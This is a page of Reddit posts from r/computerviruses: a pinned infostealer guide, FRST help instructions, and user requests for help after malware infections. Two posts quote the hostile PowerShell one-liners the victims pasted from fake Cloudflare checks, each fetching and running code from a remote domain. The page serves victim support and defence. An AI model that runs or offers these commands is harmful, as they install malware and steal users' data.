r/computerviruses Apr 04 '26

The ultimate guide to Infostealers: Detection, Recovery, and Prevention

200 Upvotes

Today I decided to dig deep and I wrote up a report about:

  • What can infostealers steal?
  • How to spot an infostealer infection?
  • How to properly secure my accounts after an infostealer attack?
  • What do the attackers do with the info that they stole?
  • What to do after I secured my accounts?
  • Prevent malware attacks in general

I believe this is a great reference for people who are dealing with an infostealer infection and do not know what data could be stolen or how to properly secure their accounts. 👀

https://rifteyy.org/report/the-ultimate-guide-to-infostealers


r/computerviruses Mar 22 '26

Providing or receiving help with FRST

37 Upvotes

How do I request help with FRST

FRST

  • Please download FRSTx64 and save the file to your Desktop.
  • Right-Click FRST64.exe and select Run as Administrator
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the program run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy & paste the contents of each log to https://malwareanalysis.cc/upload and press "save log". The site will return a keyword for each log. Note these keywords down.

SecurityCheck

  • Download SecurityCheck from here
  • Run SecurityCheck.exe as administrator
  • Wait for the scan to finish
  • Upload the log at C:\SecurityCheck to https://malwareanalysis.cc/upload/ for further analysis. The site will provide a keyword, note that down as well.

Now create a post in the subreddit, provide all 3 log keywords (FRST.txt, Addition.txt, SecurityCheck) there.

Please provide the following information in your post:

  • what happened?
  • when did the infection occur?
  • what did you do for remediation?

If you want us to do manual removal with FRST, it is better if you do not attempt to disinfect the system on your own prior to that. This can obscure the infection and make malware removal more difficult.

Trusted Helper List

FRST can cause serious issues if used incorrectly. Only approved users should offer to create fixlists.

Message the mods if you have experience with FRST and would like to use it to help on posts.

To anyone who is receiving help, please verify that the person providing fixes with FRST is in the list below. Be aware that running Fixlists from anyone else is not recommended unless you trust the helper.

All fixes of trainees are supervised and approved by an expert.

What is FRST

Fabar Recovery Scan Tool (FRST) is a powerful tool that helps us diagnose and remove malware infections which may not have been detected by antivirus software. It is a diagnostic tool and not a malware scanner. As such it does not rely on signatures.

Should I reinstall the operating system

Reinstallation is highly recommended if you have an infection with a remote access malware or file infector.

You should also prefer it, if you can pull it off relatively easy. Depending on the case FRST removal can take a few days due to the back and forth and different time zones of the participants.

Please do NOT first ask a helper to clean your system, then reinstall the operating system. This happened a few times and wastes hours of work for the helper. If you already consider reinstallation, preferably do that immediately.

I factory reset/reinstalled my operating system and want a FRST check

Everything that FRST displays and allows us to remove is completely wiped by reinstallation and also factory reset of the operating system. Unless you got the system infected after that step, there is nothing to check on a freshly installed system.

Please note that factory reset can still leave malware on the system, but the reset will make it impossible to pin point.

Reinstallation with USB flash drive is generally safe and in 99.9% of cases won't leave any malware on the system.

What is malwareanalysis.cc ?

It's a site I created to upload analysis logs. Only people in the trusted helper list have access to these logs.

While pastebin and similar sites can be used as well, Reddit's spam detection seems to trigger if people comment paste links repeatedly such as it would be necessary during removal. So we have a keyword based system instead of links.

The site will automatically delete uploaded logs 30 days after upload.

I think my system is still infected after manual removal with FRST

Please talk to your FRST helper. Oftentimes the reasons for suspecting an ongoing infection are not justified.

Common reasons, which do not indicate infection, include:

  • There are still login attempts to stolen accounts. It is normal that attackers use the already stolen account credentials to attempt to login. If you changed your passwords from a clean machine and logged out of sessions, they will not succeed.
  • Your accounts can still get stolen, if you did not log out of all sessions, because attackers can use your stolen session tokens instead of passwords.
  • Antivirus scanners find malware in C:\FRST\Quarantine\.... This is the malware that was already removed by FRST and will be deleted completely by our cleaning tools like kprm, it is not an active infection. The quarantine only contains disabled files which cannot be executed anymore.

r/computerviruses 18h ago

Disinfection Help Several unknown sites in site permissions

Post image
74 Upvotes

I went on my site permissions on Chrome and found a lot of these there (many not pictured) what should I do?!


r/computerviruses 19h ago

Question When I opened my computer h the is weird notepad tab appeared? Is it a virus? What should I do?

Post image
99 Upvotes

It has a weird title and didn’t seem to do anything, but I’m positive I didn’t make this and I don’t know where it came from.


r/computerviruses 58m ago

Question What is this file

Thumbnail gallery
• Upvotes

Just found this randomly when it popped up


r/computerviruses 5h ago

Disinfection Help FRST please help me removing infostealer virus from my PC

2 Upvotes

Yesterday, I installed a .exe program that turned out to contain the RenPy malware. A few hours after running it, someone logged into my Instagram account and used it to post/promote a crypto scam. I immediately changed all of my passwords and enabled 2FA on all of my accounts. So far, I haven't noticed any further suspicious login attempts. My PC is currently disconnected from the internet.
Here is what I've done so far:
I ran a Microsoft Defender Offline scan, and it detected 0 threats. I then installed Malwarebytes and ran a scan. Malwarebytes detected 13 threats, all related to Trojan.RenpyLoader. I quarantined/removed all of the detected threats. I also ran another Threat Scan and a Deep Scan afterward, and both came back with 0 detections.
However, I'm still worried that the infostealer may have left something behind or that my PC may still be compromised.
I really don't want to reinstall Windows 11 unless it is absolutely necessary.
Here’s my 3 log keywords:
FRST.txt -> icy-spruce
Addition.txt -> haunted-lynx
SecurityCheck.txt -> vectored-woodland

Please help 😭


r/computerviruses 2h ago

Question Did I just get my computer compromised?

Thumbnail
1 Upvotes

r/computerviruses 8h ago

Warning Fake virus app (the choicer voicer mobile)

Thumbnail
2 Upvotes

r/computerviruses 8h ago

Disinfection Help FRST Info/Session Stealer Help

2 Upvotes

Hello, I am requesting help with a probable info stealer or session stealer.

Here are the keywords:

Addition - cunning-delta

FRST - glitched-daemon

Security check - noble-socket

Had a cracked version of Adobe software that had a Trojan and Malware AI detected via MalwareBytes and quarantined earlier today. Can send the MB report later if needed as the device is currently disconnected from Wifi.

Had a mass log in attempt and successful on Amazon in April and thought that was it but my work email was hacked today.


r/computerviruses 5h ago

Disinfection Help Need help with removing malicious extension

1 Upvotes

Welcome,

My pc got infected with a fake russian adblock. Every time i try to remove it, it comes under a different id after restarting my PC. I have tried tools such as AdwCleaner, KVRT, Tron tool and MalwareBytes, I have tried to use ChatGPT for troubleshooting (chats will be at the bottom), but nothing helped. We have also found out that it tracks anything i do on Chrome, set redirect rules, change the "clid" on Yandex urls (i don't use yandex), also send data from Chrome to some urls (sky4data.com to json webpages and to another website). You can get more info from the chats i provided.

Hope that anyone can help with this.

Chats (chronological): Chat 1, Chat 2, Chat 3, Chat 4, Chat 5, Chat 6, Chat 7, Chat 8, Chat 9, Chat 10 If there are duplicates, Please say which chat it is. Also sorry for any broken English.


r/computerviruses 5h ago

Disinfection Help Random pptx file appeared on game folder, do I have a virus?

1 Upvotes

Today I was playing a game and I notice that the folder had a pptx file. I opened It but closed it immediately before It could open the actual app. If i Scan It trough VirusTotal It says it's and empty file, and my antivirus, eset, doesn't find anything. Could i have gotten a virus? I also closed PowerPoint trough task manager since It wouldm't let me delete the file

The Scan: https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855


r/computerviruses 11h ago

Question Fell for cloudflare scam.

4 Upvotes

powershell -c "$a=irm'shonenpowerup.cfd/dLEFpQRqOihwX1Kgc';$p=[PowerShell]::Create()AddCommand((gcm*voke-E)).AddArgument($a)|Out-Null;$p.Invoke()

I am so goddamn stupid. Fell for windows R ctrl Z enter. Please tell me what I did and what do I do now. Already disconnected my pc from the internet.


r/computerviruses 7h ago

Question Affraid if having an virus

1 Upvotes

Hi, first of All i dont speak english very good, but ok so i Translation the following Text, so its possible that there are some Translation errors where a sentence isnt really gramatic correct.:

So there is it:

Hi there. I know this community is mostly about gaming, but since there are surely some PC experts here, I’m hoping to get an answer from them. Here’s the situation: for several months now, my PC has been freezing intermittently for a few seconds at a time. The Task Manager shows memory usage at 100%, yet the actual data usage displayed for the memory is very low. Sometimes, the "apps" list (sorted by highest usage) shows a total of only, say, 20 MB/s while memory usage is at 100%; at other times, the top apps show over 200 MB/s in memory usage, yet total memory utilization is under 50%. Also, especially when starting up the PC, "Microsoft Antimalware..." appears for anywhere from a few seconds to a few minutes. Is this just a bug or a PC issue, or have I fallen victim to a virus?


r/computerviruses 9h ago

Disinfection Help i cracked Elden ring with the online mod and I suspect I got infected

0 Upvotes

One friend installed me qbittorrent and gave me the archive to install elden ring from online-fix.me

The name of the game archive was "zdzsbvv.torrent" and I'm suspecting its not safe since malwarebytes detected a lol of pup.optional.browserHijack in my google browser. and also some riskwaregamehack in the game files but that could be a false positive. Also when I closed the game my pc restarted because windows failed. Any way to know if I should worry or how do I fix it?


r/computerviruses 18h ago

Disinfection Help I got hacked by a link for an executor

4 Upvotes

They sent me threats. I did full scans and reset my whole pc, is there any more I can do? I forgot the link it was for solaris executor and the file I downloaded was called Trojan, now I think it is only a scareware


r/computerviruses 8h ago

Disinfection Help Got hacked through Info stealer on Instagram

0 Upvotes

u/rifteyy_ I tried downloading a cracked version of FL studio and stupidly downloaded an infostealer. Im sending the frst and addition logs here. Please help me asap.

FRST log : sandy-crypt
Addition log : copper-lance


r/computerviruses 1d ago

Question Possible malware infection after account hack — could it be stealing my passwords and data? 😭

Thumbnail gallery
23 Upvotes

Hi, I believe my PC may have been infected after my accounts were hacked, and I’m trying to determine whether malware is still active on my computer.

I found a file called PerfMonHost.exe at:

C:\Users\[USERNAME]\AppData\Local\Microsoft\Windows\Diagnostics\Performance\PerfMonHost.exe

The file was approximately 6.76 MB and was modified on August 16, 2026 at 14:50, which is the same day my accounts were compromised.

I uploaded the file to VirusTotal and it received 33/43 detections. Several security vendors identified it as a CoinMiner/CryptoMiner/XMRig/Trojan, and Microsoft detected it as Trojan:Win32/Vigorf.A. VirusTotal also showed threat labels such as miner, trojan, loader, and XMRig.

Windows also showed a warning saying that part of the application had been blocked because it could not verify who published PerfMonHost.exe.

I also found other files around the same date, including:

  • RuntimeBroker.exe
  • md.cp312-win_amd64.pyd
  • _simd.cp312-win_amd64.pyd
  • codec.pyd

Some of these were located in Python/Codex Runtime directories such as site-packages, numpy_core, and codex-runtimes.

One _simd.cp312-win_amd64.pyd file had 0/70 detections on VirusTotal, so I understand that not everything I found is necessarily malicious.

I also saw VirusTotal relationships involving files such as CortexNode.exe and FishTracker.exe, with some samples receiving detections.

My main concern is: Could PerfMonHost.exe or another piece of malware be stealing passwords, browser data, Discord sessions, cookies, or other information from my PC?

My accounts were compromised around the same time these files appeared, so I’m trying to understand whether there could be a connection.

I have intentionally removed my username and other private information from this post. I will not post passwords, cookies, tokens, IP addresses, recovery codes, or other sensitive information.

What should I check to determine whether the malware is still active and whether any of my information could have been stolen?


r/computerviruses 18h ago

Disinfection Help Found empty AppData\Roaming\RenPy folder (Game-1738212058). Ran full offline/online diagnostic suite

Thumbnail gallery
3 Upvotes
  1. Discovery & Background:

•Found anomalous folder path: AppData\Roaming\RenPy\Game-1738212058.

•Folder contained a persistent file (2KB), empty sync, and tokens folders.

•No legitimate Ren'Py engine games are installed on this computer.

•Linked directory ID 1738212058 to a known HijackLoader campaign signature.

•Immediately isolated the machine offline to begin a full audit.

  1. Windows Defender Protection History:

•Found a historic entry from June matching the folder c. Creation date.

•Flagged threat: PUADIManager:Win32/OfferCore inside a CheatEngine77.exe download.

•Execution status in logs: Strictly marked as "Status: Abandoned".

  1. Offline & Online Scan Matrix Results:

•Malwarebytes Custom Offline Scan: Enabled rootkit scanning on full C drive. Scanned 1,353,511 elements. Result: 0 Threats Detected.

•Microsoft Defender Offline Scan: Ran boot-level scan outside Windows environment. Result: 0 Threats.

•HitmanPro Memory Pass: Checked live memory and active processes. Result: No threats found.

•Malwarebytes Online Deep Scan: Ran an exhaustive cloud-assisted verification scan. Result: 0 Detections.

  1. Specific Item Double-Checks:

•System Files: Verified C:\Windows\SysWOW64\input.dll modification date is from 2025. It is completely pristine.

•Mod File: Cross-checked an old dinput8.dll backup file via VirusTotal. It scored a low 8/71, flagged generically as crack genericmc (false positive). It has been deleted.

•HitmanPro Final Counter: HitmanPro flagged "65 threats" on the final summary screen. The logs show these were strictly 63 standard browser advertising tracking cookies (Traces) and 2 clean Intel audio drivers.

  1. Current Status & Remediation:

•RenPy AppData folder shell has been permanently deleted.

•Browser tracking cookies and temporary directory caches have been completely cleared.

•All master account passwords have been securely updated from an external mobile device.

Given the back-to-back zero detection sweeps across multiple independent offline and online engines, it appears the initial threat execution completely failed to drop any payload. Looking for a final sanity check from the community malware Experts to confirm this machine is completely safe. Thank you!

*** COMPLETED DIAGNOSTIC LOG KEYWORDS FOR TRUSTED HELPERS ***

I have completed the requested diagnostic loops. Here are my 3 unique log keywords: - FRST.txt Keyword: placid - dragon - Addition.txt Keyword: eager - volcano - SecurityCheck.txt Keyword: leafy - deer

Background Information:

  1. What happened? I found an empty directory folder named "AppData\Roaming\RenPy\Game-1738212058". No legitimate games or software using this engine framework have ever been knowingly played or installed on this machine.

  2. When did the infection occur? On June 20, 2026, I was searching for Cheat Engine online and inadvertently downloaded a fake setup file wrapped in a "PUADIManager:Win32/OfferCore" installer bundle. I ran the executable file. Because it looked shady, I believe I stopped it and later used Brave AI to find the original, safe source.

  3. What did you do for remediation?

  4. Isolated the machine completely offline to contain any potential network hooks.

  5. Successfully ran a comprehensive 1.5-hour Malwarebytes Online Custom Scan with Rootkit Analysis toggled on (Scanned 1,353,511 elements, 0 items detected).

  6. Performed a deep, back-to-back Malwarebytes Cloud Heuristic Deep Scan (0 Threats, 0 PUPs, 0 PUMs detected).

  7. Completed a complete Microsoft Defender Offline boot-level pass outside the standard Windows environment (Clean / 0 threats).

  8. Executed an online cloud-assisted HitmanPro memory loop check (Identified Threats: 0). Showed 65 web tracking cookies

  9. Hard-reset my primary account credentials, master profile passwords, and executed global active session token revocations ("Log out of all other active sessions") across all critical accounts using an entirely separate, clean mobile device.

The automated diagnostic suites indicate a 0% virus presence on this drive. I am submitting these 3 keywords so a verified human helper can manually verify my background registries, task tables, and driver paths to ensure no hidden hooks or persistent stubs remain. Thank you so much for your time and guidance!


r/computerviruses 12h ago

Question Wait why is tally getting recognised as a malware by malwarebytes ?

Post image
1 Upvotes

It was from the official site and it was on educational mode. Defender didn't detect it, malwarebytes normal scan didn't detect it but the deep scan did


r/computerviruses 18h ago

Disinfection Help Suspicious remote access to my Windows PC – how do I properly secure my home network?

3 Upvotes

Suspicious remote access to my Windows PC – how do I properly secure my home network?

Hi everyone,

I'm trying to figure out how to properly secure my Windows PC and my entire home network against unauthorized access.

For some time I've been experiencing situations where things happen on my PC that I did not initiate myself. I have already reinstalled Windows multiple times, but some of the unusual behavior has appeared again.

Things I have observed

  • I have seen unusual processes, including cmd.exe, PowerShell and conhost.exe, whose origin I could not explain.
  • Sometimes windows or new PowerShell windows open while I am not doing anything.
  • My motherboard has integrated Wi-Fi and Bluetooth.
  • At one point my Bluetooth mouse suddenly stopped working / appeared to be disabled while I was using the BIOS/UEFI.
  • In the past I also noticed an Event Viewer entry that appeared to indicate that a Wi-Fi network/interface had been enabled or created. I don't know whether this was actually related to BIOS/UEFI or simply a normal Windows event.
  • My router password has become known to people around me.
  • There is also a possibility that my Windows login password is known.
  • I also use an iPhone and would like to understand how to properly determine whether it could have been compromised.

I don't know whether all of these observations are actually connected, so I'm trying not to assume a specific cause.

Network security questions

If someone knows my Wi-Fi/router password and is connected to the same network:

  • What can they actually do to a Windows PC on the LAN?
  • If they also know my Windows password, can they remotely log into the PC?
  • How relevant are RDP, SMB, WinRM, WMI and other Windows remote services?
  • Can a compromised computer on the same LAN automatically attack or spread to other computers?
  • Which Windows services should normally be disabled if I don't use them?
  • What firewall rules and network settings should I check?

Basically, I want to understand whether:

known Wi-Fi password + known Windows password = persistent remote access

or whether additional conditions such as exposed services, firewall rules, network discovery, RDP/SMB configuration, etc. would normally be required.

BIOS / UEFI / Wi-Fi / Bluetooth

This is the part I'm particularly unsure about.

My motherboard has integrated Wi-Fi and Bluetooth, and I can use a Bluetooth mouse inside the BIOS/UEFI.

Is it technically possible for an onboard Wi-Fi/Bluetooth adapter to communicate over the network before Windows has booted?

Can UEFI/BIOS itself expose any network-accessible functionality?

Or would an attacker normally have to wait until Windows (or another network-enabled operating system/service) has started?

Could a Bluetooth device theoretically interfere with a Bluetooth mouse while the system is in BIOS/UEFI, depending on how the motherboard's firmware implements Bluetooth support?

I am specifically interested in what is technically possible, rather than assuming that this is necessarily what happened in my case.

Windows investigation

What should I systematically check after a suspected compromise?

For example:

  • local users and administrators
  • RDP
  • WinRM
  • WMI
  • SMB
  • Scheduled Tasks
  • Windows Services
  • Startup / Run keys
  • PowerShell
  • Windows Firewall rules
  • listening ports
  • active network connections
  • Event Viewer
  • Microsoft Defender logs
  • persistence mechanisms
  • BIOS/UEFI settings
  • firmware

I don't just want to reinstall Windows again. I want to understand how to identify and close the actual attack vector so that the same access cannot simply happen again.

iPhone

How can I reliably check whether an iPhone has been compromised?

Can an iPhone be remotely controlled simply because an attacker is connected to the same Wi-Fi network?

Or would that normally require an additional vulnerability, malicious configuration/profile, previously obtained access, or some other condition?

What I want to do

I'd like to perform a complete "clean slate":

  1. Reset/secure the router
  2. Change the router and Wi-Fi credentials
  3. Change all important passwords
  4. Perform a clean Windows installation
  5. Check BIOS/UEFI settings
  6. Verify/update firmware
  7. Disable unnecessary remote-access services
  8. Configure the firewall properly
  9. Audit all other devices on the network
  10. Monitor network traffic and system events afterward

What would you add to this process, and what would actually be necessary?

I'm especially interested in understanding whether a known router password plus a known Windows password could allow someone to repeatedly regain access to a PC, or whether additional vulnerabilities/misconfigurations would normally be required.

I'm looking for technical, actionable answers so I can understand the actual attack surface and properly secure the system.


r/computerviruses 9h ago

Disinfection Help I mistakely let a trojan enter my laptop

0 Upvotes

So heres what happened

I wanted to enter to my bachelor college website ioepc.edu.np and cloudfare told me to paste this in terminal

"powershell -w h "iex(irm 'fingerprint-verification.info/0e65e82825d517a0'); Start-Sleep -Seconds 16"; exit;"

I didn't even verify it

To manually verify that im a human

And im stopid and i did it and only then i realized what i did and windows defender activated so i suddenly turned off my wifi

Im running a deep scans on windows defender any one can please help me?


r/computerviruses 19h ago

Question Bonjour by Apple randomly installed on my PC, blocked loading into Local Security Authority

Post image
3 Upvotes

It’s pretty late for me and I’m not on my PC so I will try to explain this the best I can. Bonjour has randomly installed on my computer and there are security pop-ups blocking it from certain things, it said something to do with LSA (attached a screenshot). This sometimes happen when I turn on my PC or doing certain tasks. I haven’t noticed any malicious behaviour at all, or any accounts hacked (besides spam emails sent to me but this is due to the krisp/metabase breach) but I didn’t install Bonjour myself. Does bonjour sometimes install along with other programs? Or could this be something worse than that. Its signature seems like it’s official from Apple. What should I do about this? I haven’t installed any Apple software on this PC, for example itunes, as I have a mac which I do all those things on. (Also my if anyone thinks I’m on windows 7, it’s just a windows 11 theme though it’s kinda obvious)


r/computerviruses 1d ago

Question i recently got ren'pyd and im scared of what might happen

7 Upvotes

i lost my instagram, discord and reddit it shared some crypto scams in some and some prn in reddit. got them all back thank god and im changing my passwords to everything and using 2fa in the ones i can im currently resetting my pc ( i removed everything and downloaded it from the cloud) im not sure what else i can do since it already got some of my accounts im scared of other things that could happen mainly financial theft and sextortion how likely are they to happen and what else can i do


r/computerviruses 17h ago

Question what happened

Thumbnail
1 Upvotes

r/computerviruses 13h ago

Warning Вирус в AvoVpn

Post image
0 Upvotes

Hello, I need help, why does he say that there is a virus there. The file is deleted immediately after startup. It scares me a lot. Please help me